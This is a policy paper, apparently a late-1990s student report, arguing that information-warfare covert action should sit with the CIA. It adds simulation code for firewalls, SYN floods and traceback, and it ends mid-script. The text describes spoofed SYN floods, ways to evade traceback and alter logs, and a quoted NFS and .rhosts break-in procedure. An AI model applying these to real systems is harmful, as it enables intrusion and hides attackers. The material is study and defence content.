Table of Contents:
Executive Summary: Information Warfare
This report begins by tackling the broad issue of whether covert action is a morally acceptable tool of U.S. foreign policy. In constructing a utilitarian justification of covert actions, the paper examines the efficacy of covert actions vis-a-vis other policy options. The paper then tackles the thorny issue of which government agency should have jurisdiction over IW, examining the qualifications of the Central Intelligence Agency (CIA) and the Department of Defense (DOD). Next, the paper delves into the more technical aspect of information warfare, discussing a subset of the most common techniques employed. Finally, the paper proposes a hypothetical application of an IW covert operation targeting Osama bin Laden.
When considering whether covert action is morally justifiable, one can either take a deontological or a utilitarian approach. A deontologist might condemn covert actions by upholding the preservation of democratic ideals, such as transparency of motive, as the highest good. Thus, even if a covert action saves lives, it is still immoral. However, the utilitarian approach is more persuasive. A covert action can only be judged relative to the other policy options. Imagine the abstract situation in which a hostile entity threatens the national interest of the United States. Assuming that aggression is justified, the U.S. can either utilize covert action or overt action. Empirically, covert actions can save both American lives and the lives of enemy civilians. Furthermore, covert action does not violate democratic ideals because the Congressional Oversight system allows the people representation in the form of the Select Intelligence Committees.
The next issue addressed is a practical one: which government agency should control information warfare covert operations? There are really only two viable options: the DOD and the CIA. The DOD’s current superiority in IW techniques and the need for quick transitions from peacetime intelligence to wartime intelligence dictate that, without a doubt, the DOD should retain its wartime IW capability. However, the CIA should have jurisdiction over IW covert operations. First, only the CIA has an established and proven system of accountability, which is essential for the justification of any covert action. Furthermore, many IW covert operations will target international criminals such as narcotics traffickers. The DOD’s organizational mission is to protect the physical security of America, not necessarily to fight the war against drugs. Thus, the DOD, in a situation of limited resources, might neglect the fight against international criminals in favor of spending more money on military operations.
The numerous techniques of information warfare, many of which are developed by civilian "hackers", preclude a complete discussion of tactics. First, this paper provides a brief overview of networks. Then, it explains denial of service attacks, in which a hacker incapacitates the target computer by flooding it with information. Next, it talks about exploiting the various security holes in the Unix operating system in order to gain unauthorized access into a network. The report then explains how infiltration of a single computer can lead to the subversion of the entire network. Lastly, the report discusses the variety of attacks that can be executed once access is gained, including viruses, worms, and Web spoofing. Note that all of these methods are routinely used effectively by hackers.
Finally, this report develops a hypothetical information warfare covert operation targeting Osama bin Laden. U.S. operatives have situated a satellite directly above bin Laden’s hideout, enabling them to intercept his cellular and satellite phone calls. Furthermore, bin Laden’s captured accomplices have provided information regarding his financial assets. The hypothetical covert action would entail freezing or eliminating bin Laden’s assets. This could be accomplished by using IW techniques to infiltrate the rogue banks providing haven for bin Laden and subsequently depleting his accounts in these banks. The report concludes that this operation is quite feasible and could remain covert.
Information Warfare Covert Actions:
Efficacy, Jurisdiction, Techniques, and Applications
"For to win one hundred victories in one hundred battles is not the acme of skill. To subdue an enemy without fighting is the acme of skill."
U.S. policy makers have always turned to covert actions in the hope of defeating adversaries without overtly engaging them. And, to a certain extent, covert action has fulfilled its promise over the past fifty years. Now, at the turn of the millennium, scholars and civil servants are critically reexamining covert action. Is covert action an appropriate tool of foreign policy? Can it adapt to the changes associated with the Information Revolution? If so, who should be responsible for this new breed of covert operations?
This report begins by tackling the broad issue of whether covert action is a morally acceptable tool of U.S. foreign policy. In constructing a utilitarian justification of covert actions, the paper examines the efficacy of covert actions vis-a-vis other policy options. The paper then tackles the complex issue of which government agency should have jurisdiction over IW, examining the qualifications of the Central Intelligence Agency (CIA) and the Department of Defense (DOD). Next, the paper delves into the more technical aspect of information warfare, discussing a subset of the most common techniques employed. The paper then proposes a hypothetical application of an IW covert operation targeting Osama bin Laden. Finally, the paper provides several policy recommendations regarding information warfare covert actions.
Utility of Covert Action in Post Cold War Era
As our task force analyzes the history of the CIA, it is clear that the agency has committed numerous fundamental errors both in planning and in implementing past covert operations. However, these debacles, such as the Bay of Pigs, do not prove that covert operations are inherently unwise. Rather, they highlight particular errors in judgment made by the CIA. Fortunately, analyzing these failures allows us to formulate a set of guidelines that will give future missions a high probability of success. Specifically, a covert operation must conceal the role of the U.S. government, must be of short duration, and must be consonant with U.S. foreign policy.
By adhering to these heuristics, the U.S. will endow itself with a powerful policy option.
In the post Cold War era, avoiding open warfare is extremely important because the widespread proliferation of weapons of mass destruction and international terrorism enable even the smallest countries or groups to exact a punishing revenge from the U.S. Covert action, by definition, is an action somewhere between peacetime diplomacy and outright aggression. There are obviously certain situations in which utilizing covert operations is the most effective policy option. For instance, when the U.S. national interest conflicts with the interest of another nation or group but the conflict does not merit a declaration of war, executing a covert action can prevent open hostilities. If properly performed, the operation will accomplish U.S. objectives. It will also leave no evidence of U.S. involvement, making it difficult for the victim to justify counter-attack against the U.S.
Information warfare (IW) has the potential to become one of the most decisive forms of covert action in the 21st century. IW, in the context of covert action, means using computers for information obstruction, information exploitation, and systems destruction. The post Cold War period coincides with the most innovative technological era in history. The worldwide network of computers known as the Internet is doubling its traffic every hundred days. Of course, such rapid growth is accompanied by growing pains in the form of rampant security vulnerabilities. Computer product cycles have been compressed to the point where exhaustively checking for security flaws in products is infeasible. In addition, the world is increasingly reliant upon computers and networks. It is not an exaggeration to say that all countries and major organizations depend on computers and networks for critical activities. These concurrent trends of security holes and widespread reliance dovetail nicely to provide an attractive target for covert operation attacks. Thus, as the world’s reliance on global electronic networks increases, its vulnerability to IW increases commensurately.
In addition, IW is conducive to covert operations because it naturally adheres to the three aforementioned guidelines governing all covert actions. First, covert IW operations can easily conceal the role of the U.S. government. The remote nature of an IW attack means that there is rarely any human contact involved. Furthermore, an IW operation usually entails either hijacking or destroying an enemy computer. Thus, the logs of the attack can often be altered to hide the U.S. presence, or destroyed outright. Finally, and most importantly, because so many independent hacker groups exist worldwide, an IW attack will not immediately cast suspicion on the U.S.
IW operations also meet the short duration criterion. IW attacks involve a great deal of planning in order to avoid detection. However, the actual execution of an IW attack can be as brief as is desired. For instance, a typical attack might involve stealing a password file, spending several hours cracking the hashed passwords it contains, and subsequently logging into the computer with the recovered passwords. At this point, the computer could easily be destroyed within a matter of seconds. Alternatively, the attacker could log in and steal information intermittently for an indefinite period of time. Or, the attacker could install a program on the victim computer which automates the information gathering and removes itself and all traces of its existence after a set period of time.
Finally, IW can be consonant with U.S. foreign policy. Like any other weapon, if the President uses IW wisely, it can reinforce existing policy. Obviously, there is a potential for abuse, but this drawback is not unique to IW; it is a problem for any type of covert operation.
In conclusion, covert operations continue to provide a valuable policy option to the U.S. In fact, the lessons learned from past failures will ensure future success. As nations and corporations increase their reliance on the global communications network, many traditional classes of covert operations, such as paramilitary attacks, will become unnecessary and/or irrelevant. By developing expertise in IW, the U.S. will endow itself with an incredibly potent weapon.
Moral Justification for Covert Action
Justifying covert action in a vacuum is difficult; the argument inevitably invokes utilitarian principles by claiming that covert action saves lives. Thus, the previous section demonstrating the utility of covert action is an important backdrop for this section. Although covert action is a valuable tool, many people who support overtly declared war have moral objections to its use. The underlying idea is that covert action unnecessarily excludes the populace from the decision making process. However, this argument is flawed. Assume that an entity is engaging in activities that directly threaten the U.S. national interest, that diplomatic efforts have failed, and that some action must be taken. Then, there are only two scenarios for remedying the situation.
First, the U.S. could publicly declare its intention to take action against the enemy and proceed to do so. The advantage of this approach is that there is public dialogue regarding the rationale for attacking the enemy. The largest drawback is that the U.S. effectively forewarns the enemy of the impending attack, reducing the probability of success and likely endangering the lives of U.S. agents. In addition, publicly announcing our hostile intentions might arouse the ire of the international community, possibly causing repercussions in the United Nations.
The other option is for the U.S. to mount a covert operation against the enemy. The key advantages to this approach are that the element of surprise dramatically increases the probability of success and reduces risk to American agents and that the likelihood of immediate retaliation is mitigated. There are two disadvantages to this approach. First, ethically, it is inconsistent with democratic ideals not to consult the populace. Second, practically, making the realistic assumption that evidence of U.S. involvement will eventually become public, the standing of the U.S. in the international community might be more adversely affected by this "underhanded" behavior than it would be by a transparent, overt attack.
Practically speaking, the covert option is superior. The only practical policy drawback to covert action is the preceding argument regarding U.S. standing in the international community. However, the international community already expects such behavior from the U.S., so U.S. standing will not be drastically affected. Widespread knowledge of U.S. actions in Guatemala in the 1950’s, Cuba in the 1960’s, Chile in the 1970’s, and Nicaragua in the 1980’s has trained the international community to expect the U.S. to engage in covert action. Moreover, this argument falsely assumes that the nature of the covert and overt operations would be identical. Precisely because a covert operation has the element of surprise, ancillary casualties will likely be lower and less overall force will be used relative to an overt operation. The smaller scale of the covert mission will not anger the international community as much as the overt operation would. It is clear, then, that to save American lives and to preserve U.S. prestige in the international community, the secrecy of covert operations is necessary.
Moreover, the CIA’s covert action accountability structure does allow for adherence to the democratic process, albeit in a limited form. The involved approval process requires thorough knowledge and support both from the executive and legislative branches of government. So, although the public is not informed of the covert operations, their elected representatives and elected president make this decision for them by proxy. This process ideally represents the best of both worlds: it preserves both the secrecy necessary for a successful mission and the accountability required for a healthy democracy.
In sum, the moral justification for covert operations has two essential components. First, covert action can achieve objectives with fewer casualties and less damage to the U.S. international standing than an overt action would entail. Second, covert action is justified because the current accountability process adequately adheres to the democratic process. Note that this implies that some past covert operations were not necessarily justified because such a structure did not exist at that point. It also implies that any covert action performed by an agency other than the CIA might not be ethically justified because the accountability structure does not apply to them.
Jurisdiction of IW: DOD or CIA?
Argument for DOD: Efficiency
Having showed that information warfare can serve an essential function in the post Cold War era and that covert action in general is ethically justified, the next logical issue is deciding which organization should control IW covert operations. There are two realistic options: the CIA or the Department of Defense (DOD). Not surprisingly, this decision entails a tradeoff between efficiency and accountability.
The DOD has amassed far more expertise in IW than has the CIA. IW is a relatively new practice; the U.S. first used it extensively early in the 1990’s, during the Gulf War. The DOD had sole responsibility for this wartime application of IW, and gained valuable experience. The CIA also has some IW capabilities; however, they are not nearly as powerful as those of the DOD. Furthermore, the 1990’s have been politically turbulent for the CIA. The Aldrich Ames spy scandal, Senator Torricelli’s accusations that the CIA sponsored executions in Guatemala, and the controversial San Jose Mercury News series linking the CIA to drug dealers in South Central Los Angeles all have eroded popular support for the Agency. Thus, it is difficult for the CIA to obtain either new funding or new areas of responsibility.
With neither the mandate to commandeer the U.S. IW capabilities nor the resources to develop in-house expertise, the CIA has fallen behind the DOD in IW. Thus, continuity and efficiency would dictate that the realm of IW be assigned to the DOD.
Furthermore, there is significant crossover between the peacetime and wartime applications of IW. A peacetime IW covert operation and a wartime military IW operation are very similar in their attack methodologies. In both cases, security vulnerabilities are exploited to gain unauthorized access to enemy computer networks. The only technical difference between a peacetime IW attack and a wartime IW attack is the amount of damage inflicted. For instance, an IW covert operation might steal information about an air traffic control network, whereas a wartime IW operation might destroy the air traffic control network. This can be reduced to a policy decision, however. Minimal extra effort is required to destroy a network rather than steal its information. Thus, the IW operations are homogeneous; having one agency responsible for all IW operations, covert and overt, would eliminate duplication of effort.
Moreover, a successful war effort requires the swift integration of the resources of peacetime and wartime intelligence agencies. Historically, turf battles between intelligence agencies during wartime have been extremely counterproductive and have actually cost lives. For example, during the Vietnam War, the CIA and DOD each constantly tried to assert their superiority in intelligence collection. The result was duplication of effort and inter-agency hostility. World War II saw a more disturbing grievance. The Army and Navy intelligence agencies insisted on decrypting intercepted electronic transmissions on alternate days and presenting them to President Roosevelt. The result was a lack of coherence in the overall picture provided to the president that hindered his ability to make wise decisions.
The post Cold War era places ever more demands on swift integration of military capabilities. The best example of this is the Gulf War, whose ground campaign lasted less than one week. There was literally no time to adjust intelligence structures from "peacetime" to "wartime" mode. Rather, they had to be prepared to act immediately. And, in fact, one of the reasons that IW was so effective in the Gulf War is that it was fully integrated with the rest of the war effort; the DOD had complete control over all IW and traditional warfare operations.
In any event, no matter which agency assumes responsibility for covert operations, it is clear that the DOD must retain a wartime IW capability for the U.S. armed forces to remain superior. Given that the DOD must have a wartime IW capability and that IW covert operations and IW military operations are nearly identical, it would be most efficient for the DOD to assume responsibility for all IW.
Argument for CIA: Accountability & National Interest
The above conclusion could justify eliminating the CIA and allowing the DOD to control all intelligence activities. After all, if the DOD performed all covert actions, then the transition from peace to war would be very smooth. Clearly, though, this is not entirely desirable; otherwise, the National Security Act of 1947 would not have been signed and the CIA would not exist. The CIA was created specifically to prevent the armed forces from being excessively active during peacetime. One key difference between CIA and DOD operations is their respective accountability structures.
Before a CIA lethal operation (one which may entail loss of life) is carried out, it must go through an extensive approval process. If the operation is rejected at any step, it must begin the process anew. First, the President must ask for a finding establishing the need for a covert action. Then, the Operations Directorate designs a covert operation to remedy the problem articulated in the Presidential finding. The next step is a review by the Covert Action Planning Group, chaired by the Deputy Director of Operations (currently Jack Downing). The final internal CIA review involves the DCI and all four deputy directors.
After the CIA reviews the operation, it is sent to the White House. There, representatives from 13 executive agencies will discuss the plan’s viability. The first committee is the Interagency Working Group. Representatives from the Department of Justice, the National Security Council (NSC), the State Department, and other agencies must give approval. Next, the NSC Deputies Committee, which includes the deputy National Security Adviser (NSA), Undersecretaries of State and Defense, and Deputy DCI among others, reviews the plan. Finally, the NSC Principals Committee, which includes the Vice President, NSA, Secretary of State, Secretary of Defense, DCI, and Chairman of the Joint Chiefs, evaluates the operation. If all of these committees approve, then the President signs off and informs Congress. This can either involve telling the Senate Select and House Permanent Select Committees on Intelligence or, if the operation is sensitive, telling the "gang of eight." Technically, Congress must simply be informed of covert operations. However, because Congress controls funding for the CIA, it effectively can veto an operation of which it disapproves.
In contrast, there is no established accountability structure for DOD covert operations precisely because this is not supposed to be its responsibility. Clearly, the President must approve a DOD covert action because he is the commander-in-chief of the armed forces and thus the superior of the Secretary of Defense. However, the ambiguity surrounding the role of agencies other than the CIA in covert action played a key role in the Iran Contra affair. After Congress passed a law prohibiting CIA aid to the Contras, the CIA’s accountability structure precluded it from participating in illicit aid. However, the National Security Council staff had no correspondingly explicit restrictions. Thus, President Reagan allegedly either directly or indirectly told Oliver North, a NSC aide, to continue helping the Contras despite the illegality of the action. Allocating responsibility for IW, a subset of covert action, to the DOD might lead to a similar abuse of power.
In addition to providing a superior accountability structure, assigning the CIA to IW covert operations also better serves the national interest. The Department of Defense’s mission is "to provide the military forces needed to deter war and to protect the security of our country." This encompasses all wartime operations in addition to peacetime operations against terrorists and nuclear weapons proliferators. It noticeably excludes operations against many criminal organizations because they do not pose a direct threat to U.S. security. However, it is clearly in the national interest of the U.S. to take action against narcotics organizations. Thus, the DOD’s priorities do not completely encompass all threats to the U.S. national interest.
Obviously, it is best to assign a task to an agency that has a strong desire to accomplish the task. The CIA’s mandate is broader than that of the DOD; it includes "conducting counterintelligence activities, special activities, and other functions related to foreign intelligence and national security as directed by the President." For instance, the CIA has cooperated closely with the Drug Enforcement Administration (DEA) to fight narcotics traffickers. The danger in assigning covert IW operations to the DOD is that certain operations in the national interest will not be given the appropriate priority. For instance, were there limited financial resources, the DOD would be reluctant to divert funds from a military IW operation to an IW operation against international criminals. Although the DOD ultimately reports to the President and thus hypothetically should prioritize according to the national interest, the bureaucratic reality may be otherwise.
In conclusion, there are two distinct advantages to assigning IW covert operations to the CIA. First, the CIA has a more comprehensive system of checks on covert operations than does the DOD. The current system is effective only because all covert operations occur through CIA; when this rule is breached, incidents like the Iran Contra affair can occur. Second, giving responsibility for IW to the DOD will necessarily lead to the neglect of certain facets of national security, such as fighting crime in general and narcotics in particular. A division of IW responsibility between the CIA and the DOD would remedy this problem.
Techniques of Information Warfare
This paper will not attempt to enumerate exhaustively every IW tactic; that is not feasible given the limited space available. Rather, it will summarize several important techniques in the context of covert action. First, it will discuss denial of service attacks, which cripple a network. Then, most importantly, it will explain how to break into computers in networks. Finally, it will discuss what damage can be done once the network security is breached.
Introduction to Networks
Before doing so, however, a brief discussion about the nature of networks is appropriate. A network of computers consists of multiple computers connected to each other via physical communications equipment, such as fiber-optic lines. The rationale for a network is that it allows computers to access each other’s resources, and the resulting whole is greater than the sum of its parts. The network concept itself is not new; it has existed in primitive forms since the advent of mainframe computing early in the 1950’s.
Broadly speaking, there are two types of networks: private networks and public networks (see attached diagram). In a private network, each member computer can access and be accessed only by another member computer. For example, if a company connects five computers together but does not connect them to a phone line or to any outside network, these five computers constitute a private network. If a hostile, external party wishes to attack this network, they must physically break into the room housing the computers. Thus, private networks are secure from remote IW tactics; an attacker must obtain physical access or subvert someone who already has it. However, there are very few pure private networks because not being able to connect to the Internet is a huge drawback.
A public network is a larger version of a private network that contains various sub-networks. The best example of a public network is the Internet itself. It is a conglomeration of government, corporate, and independent networks that interact with each other. The networks which covert operations would exploit are usually a hybrid between public and private networks. They consist of private networks that can access the Internet through a firewall.
The idea behind a firewall is to route all external traffic through one specific computer or gateway (see attached diagram). For example, if a computer inside the firewall wishes to access a computer on the Internet, it will send the request to the gateway computer, which will relay the message to the external computer. When the external computer responds, it will send its message to the gateway computer, which will forward the message to the original internal computer. The point is that an external computer cannot access an arbitrary computer inside the firewall, but rather must go through the gateway. Without a firewall, breaking into the network would only be as difficult as breaking into the most insecure computer on the network. With a firewall, theoretically, an attacker must break into the gateway in order to compromise the network; the gateway is usually the most secure computer on the network.
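The gateway arrangement just described, as an added example in Python (not code from the original report): a private network sits behind one gateway, inside hosts may open conversations with the outside, replies to those conversations are relayed back in, and any other inbound traffic is dropped unless it is addressed to a service the gateway itself offers. The addresses, ports and the set of gateway services are assumed for illustration.

```python
"""Toy stateful gateway: every packet crossing the boundary between a private
network and the outside is judged here and nowhere else. Added example, not
from the original report; addresses and ports are assumed."""
import ipaddress
from dataclasses import dataclass

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/24")      # assumed private network
GATEWAY_ADDR = ipaddress.ip_address("203.0.113.1")      # assumed outside address of the gateway
GATEWAY_SERVICES = {25, 80}                              # ports the gateway itself answers (assumed)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


class Gateway:
    def __init__(self):
        # Conversations opened from inside: (inside host, port, outside host, port)
        self.conversations = set()

    def handle(self, pkt: Packet) -> str:
        src = ipaddress.ip_address(pkt.src)
        dst = ipaddress.ip_address(pkt.dst)
        if src in INTERNAL_NET and dst not in INTERNAL_NET:
            # Inside host talks out: remember the conversation so the reply can return.
            self.conversations.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "FORWARD"
        if src not in INTERNAL_NET:
            if dst == GATEWAY_ADDR and pkt.dport in GATEWAY_SERVICES:
                return "ACCEPT"        # a service the gateway itself offers
            if (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.conversations:
                return "FORWARD"       # reply to a conversation the inside opened
            return "DROP"              # unsolicited traffic aimed at an inside host
        return "FORWARD"               # inside-to-inside traffic is not the gateway's concern


def demo():
    """Sequence of constructed packets and the gateway's verdicts, in order."""
    gw = Gateway()
    packets = [
        Packet("10.0.0.5", 40001, "198.51.100.20", 80),    # inside host opens to a web server
        Packet("198.51.100.20", 80, "10.0.0.5", 40001),    # the server's reply
        Packet("198.51.100.99", 5555, "10.0.0.5", 22),     # outsider probes an inside host directly
        Packet("198.51.100.99", 5555, "203.0.113.1", 25),  # outsider reaches the gateway's mail service
        Packet("198.51.100.99", 5555, "203.0.113.1", 23),  # outsider tries telnet on the gateway
    ]
    return [gw.handle(p) for p in packets]


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

The third packet is the case the paragraph is about: without the gateway, the outsider would reach the inside host directly and the network would be only as secure as that host. With it, the outsider's only reachable targets are the gateway's own services, which is why the gateway must be the most carefully maintained machine on the network.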
Denial of Service Attacks
One method for crippling a firewalled network is a denial of service attack against the gateway computer. In the variant known as a SYN flood, the attacker sends a stream of small connection-request (SYN) packets to the target. The target reserves an entry for each of these half-open connections while it waits for the handshake to complete. Unfortunately, the target can hold only so many pending requests, and the flood quickly fills this queue. Thus, any legitimate computer that tries to open a new connection to the target is refused. Unidentified hackers perpetrated this type of attack against a New York City Internet Service Provider (ISP) named Panix in 1996. The hackers had to be clever to avoid being caught. Every packet sent is supposed to carry the address of its sender. However, the hackers used a technique called "IP spoofing" to forge the source address, so the target’s replies went to machines that never answered, and the pending entries were never cleared.
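The flood described above, as an added example in Python (not code from the original report): a listener that keeps one slot per half-open connection is flooded with SYNs carrying forged source addresses, so the slots are never released and honest clients are turned away. The same model is then run with SYN cookies, the standard defence, in which the server keeps no state and instead encodes a keyed MAC of the peer in its initial sequence number. The backlog size, addresses and port numbers are assumed; real SYN cookies also encode a timestamp and the MSS, which this model omits.

```python
"""SYN flood against a fixed-size backlog, with and without SYN cookies.
Added example, not from the original report; the backlog size and all
addresses are assumed."""
import hashlib
import hmac
import os
import random

BACKLOG = 128      # half-open connections the listener will hold (assumed)
MASK32 = 0xFFFFFFFF


class Listener:
    def __init__(self, syn_cookies=False):
        self.syn_cookies = syn_cookies
        self.half_open = {}            # (peer address, peer port) -> server ISN awaiting ACK
        self.secret = os.urandom(16)   # key for the cookie MAC
        self.established = 0
        self.refused = 0

    def cookie(self, src, sport):
        """Stateless ISN: a MAC over the peer's address and port."""
        mac = hmac.new(self.secret, f"{src}:{sport}".encode(), hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def syn(self, src, sport):
        """Connection request arrives. Returns the ISN sent in the SYN-ACK, or None if dropped."""
        if self.syn_cookies:
            return self.cookie(src, sport)           # nothing stored, so nothing to exhaust
        if len(self.half_open) >= BACKLOG:
            self.refused += 1
            return None                              # queue full: the SYN is silently dropped
        isn = random.getrandbits(32)
        self.half_open[(src, sport)] = isn
        return isn

    def ack(self, src, sport, ack_no):
        """Third handshake packet: the peer acknowledges ISN+1."""
        if self.syn_cookies:
            ok = ack_no == (self.cookie(src, sport) + 1) & MASK32
        else:
            isn = self.half_open.pop((src, sport), None)
            ok = isn is not None and ack_no == (isn + 1) & MASK32
        if ok:
            self.established += 1
        return ok


def run(syn_cookies, flood_size=1000, legit_clients=10):
    """Flood with spoofed SYNs, then count how many honest clients still connect."""
    srv = Listener(syn_cookies)
    for i in range(flood_size):
        # Forged source address: the SYN-ACK goes to a host that never completes
        # the handshake, so the slot stays occupied until it times out.
        srv.syn(f"198.51.100.{i % 256}", 1024 + i)
    connected = 0
    for i in range(legit_clients):
        src, sport = "192.0.2.7", 40000 + i
        isn = srv.syn(src, sport)
        if isn is not None and srv.ack(src, sport, (isn + 1) & MASK32):
            connected += 1
    return connected


if __name__ == "__main__":
    print("without SYN cookies:", run(False), "of 10 clients connected")
    print("with SYN cookies:   ", run(True), "of 10 clients connected")
```

Without cookies every honest client is refused once the first 128 spoofed requests have filled the backlog; with cookies all of them connect, because a forged request costs the server nothing to remember. The cookie only defends the connection queue; a flood large enough to saturate the link itself is a bandwidth problem that no end-host setting can solve.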
However, it is sometimes possible to trace these attacks (see attached diagram). This stems from the fact that when the attacker sends a packet to the target, the packet does not go directly to the target. Rather, the packet usually passes through several intermediate computers before reaching its final destination. So, in addition to the sender’s claimed address, each machine that receives the packet can tell which neighboring machine handed it over, because that is determined by the link the packet arrived on rather than by anything written inside the packet. For example, say computer W is attacking computer Z with a high bandwidth denial of service attack. W sends the packet to Z, but it does not go directly to Z. It first goes from W to X, then to Y, then to Z. W writes into the packet that the sender is another computer, say computer F. When Z receives the packet, there are two important pieces of information: the last computer it visited was definitely Y and the original sender was allegedly F.
If this packet is part of an attack, then Z will try to trace the packet to the original sender. Z knows that the sender address was probably false, but it also knows that the identity of the last hop is genuine, because the original sender cannot forge it. So the owner of Z can contact the owner of Y and ask which computer sent the packet to Y. If Y’s owner cooperates, he will say that X sent the packet to Y. Then, the owner of Z can go to X and ask which computer sent the packet to X and find out that computer W sent the packet. Because intermediate computers do not normally keep a record of every packet they relay, this only works if Y and X are logging or capturing traffic while the attack is still under way.
W, of course, is the actual attacker. When Z contacts W, W has several options. It can say that it never sent the packet, implying that Y lied to Z when it said that W had sent it the packet and thus that Y might be the actual attacker. Or, W could lie and say that some arbitrary computer R sent it the packet. Of course, when Z contacts R, R will correctly claim ignorance of the matter. So, no matter what, suspicion is cast on computer W, the actual attacker. No matter what W says, Z has narrowed the culprit down to W or Y in the first case or to W or R in the second case. In the case of Panix, certain computers which were located along the route of the attack (the equivalent of computers X and Y in the example) refused to cooperate with the investigation. Thus, Panix could not fully backtrack to the attacker, W.
A covert operation, however, could take measures to conceal its identity. First, the U.S. government could reach a secret agreement with a major U.S. corporation such that this corporation would refuse to cooperate with the victim of the attack as it searched for the perpetrator. For instance, suppose that an American covert IW team needs to interdict a financial transaction between a drug cartel and an offshore bank that will occur via the Internet. It could use a denial of service attack to overload and shut down the offshore bank’s web server, thereby stopping the drug cartel’s transaction. The IW team could route all of its packets through AT&T’s computers at some point along the path to the bank’s computer. Thus, when the bank tries to backtrack the packets, AT&T will simply not cooperate and the bank will not know who the attacker was.
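The hop-by-hop traceback of the W, X, Y, Z example above, as an added example in Python (not code from the original report), run once with every intermediate cooperating and once with Y refusing, as the uncooperative carrier in the Panix case and the AT&T arrangement would. Each node records which neighbor handed it a packet; the victim reads its own record and must ask each upstream operator for theirs. The node names and the path are the report's illustrative ones; the record-keeping is assumed.

```python
"""Hop-by-hop traceback of a packet with a forged source address. Added
example, not from the original report; names and path follow the report's
W, X, Y, Z illustration."""


class Node:
    def __init__(self, name, cooperative=True):
        self.name = name
        self.cooperative = cooperative
        self.ingress = {}     # packet id -> neighbour the packet arrived from

    def receive(self, pkt_id, from_hop):
        # The previous hop is known from the link the packet came in on, not
        # from any field the original sender controls.
        self.ingress[pkt_id] = from_hop

    def who_sent(self, pkt_id):
        """Answer (or refuse) a traceback request for one packet."""
        if not self.cooperative:
            return None
        return self.ingress.get(pkt_id)


def send_spoofed(path, pkt_id, claimed_src):
    """The attacker at path[0] sends a packet whose source field says claimed_src.
    Returns what the victim at the end of the path actually learns."""
    prev = path[0].name
    for hop in path[1:]:
        hop.receive(pkt_id, prev)
        prev = hop.name
    victim = path[-1]
    return {"claimed_src": claimed_src, "last_hop": victim.ingress[pkt_id]}


def traceback(routers, victim, pkt_id):
    """Walk upstream from the victim until the chain reaches a machine that is
    not a queryable router (the suspect) or a router that refuses to answer."""
    by_name = {r.name: r for r in routers}
    chain = [victim.name]
    hop = victim.who_sent(pkt_id)             # the victim trusts its own record
    while hop in by_name:
        answer = by_name[hop].who_sent(pkt_id)
        if answer is None:
            return {"chain": chain + [hop], "suspect": None, "refused_by": hop}
        chain.append(hop)
        hop = answer
    return {"chain": chain, "suspect": hop, "refused_by": None}


def scenario(y_cooperates):
    """Attacker W -> X -> Y -> victim Z, forging the source as F."""
    w, x, y, z = Node("W"), Node("X"), Node("Y", cooperative=y_cooperates), Node("Z")
    seen = send_spoofed([w, x, y, z], pkt_id=1, claimed_src="F")
    return seen, traceback([x, y], z, pkt_id=1)


if __name__ == "__main__":
    for coop in (True, False):
        seen, result = scenario(coop)
        print("Y cooperates:" if coop else "Y refuses:   ", seen, result)
```

In the cooperative run the chain runs Z, Y, X and ends at W, which is not a relay and therefore the suspect. When Y refuses, the chain stops at Y and the victim knows only that the packet came through Y, which is exactly the position Panix was left in.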
Additionally, the covert action team could obtain a computer account with phony information. When the attack is completed, this phony account can be closed. Thus, even if the bank were to manage to trace the attack back to this account, they would find bogus identifying information and not be able to do anything about it. This phony account need not be located within the U.S.; it could be anywhere in the world.
Unauthorized Login into Systems
Whether targeting a gateway computer or a computer behind the firewall, the techniques for gaining unauthorized access are virtually identical. Essentially, most security breaches are attributable to software or hardware defects or to misconfiguration. Some of these defects are well known and have been fixed; others are more subtle and known by only a few skilled hackers. Most large networks connected to the Internet utilize an operating system known as Unix. For example, Princeton University’s web servers, email servers, and ftp (file transfer protocol) servers are all run from Unix machines. Unix has been in extensive use for nearly thirty years, so most of its flaws are well known.
That said, it is relatively simple to break into a Unix system that has not been carefully configured. The first step, as usual, is to gain information about the target system, this time by using the Unix utility "finger." In the paper "Improving the Security of Your Site by Breaking into It," written with Wietse Venema, Dan Farmer, co-author of SATAN and a respected security expert, explains finger:
As every finger devotee knows, fingering "@", "0", and "", as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from…Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data.
Essentially, finger is not dangerous in and of itself; rather, it provides hackers with information necessary to perpetrate attacks.
The first security hole to exploit is NFS (Network File System). This attack will work only if the network security settings are lax. The purpose of NFS is to allow any computer on a network to treat other computers’ hard disks as if they were directly connected to that computer. A server is supposed to export, or share, each filesystem only to a list of trusted hosts; if it instead exports a filesystem to the whole world, an attacker can mount it from anywhere on the Internet. The list of exports, and who may mount them, can be read remotely with the standard utility showmount. Farmer, after listing the target’s exports with showmount, explains:
Note that /export/foo is exported to the world; also note that this is user guest's home directory. Time for your first break-in! In this case, you'll mount the home directory of user "guest." Since you don't have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a "guest" account in your local password file. As user guest you can put a .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password.
The information from finger and similar programs can be used to attack Unix features other than NFS as well. For example, NIS (Network Information Service), FTP (file transfer protocol), TFTP, and sendmail are installed on almost every Unix machine, and each one has had numerous security holes. For instance, NIS still has uncorrected problems. Farmer writes that "there aren't many effective defenses against NIS attacks; it is an insecure service that has almost no authentication between clients and servers… Better to use NIS as little as possible, or to at least realize that the maps can be subject to perusal by potentially hostile forces."
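The finger and NFS passages above describe a two-step check that an administrator can run against his own site as readily as an attacker can run it against a target: finger reveals each account's home directory, showmount reveals which filesystems are exported and to whom, and any home directory that lies under a world-exported filesystem can be mounted by an outsider, who can then write a .rhosts file into it. The following is an added example, not part of the original paper or of Farmer's text, that automates that comparison. The finger and showmount outputs are constructed sample data in the SunOS-era formats; the hostnames and accounts are fictitious.

```python
"""Audit check combining finger and showmount output.

Added example, not part of the original paper or of Farmer's text. It finds
home directories that sit inside filesystems exported to the world, which
is the precondition for the .rhosts attack Farmer describes. Sample data
below is constructed; hostnames and accounts are fictitious.
"""
import re
from typing import Dict, List, Tuple

FINGER_OUTPUT = """\
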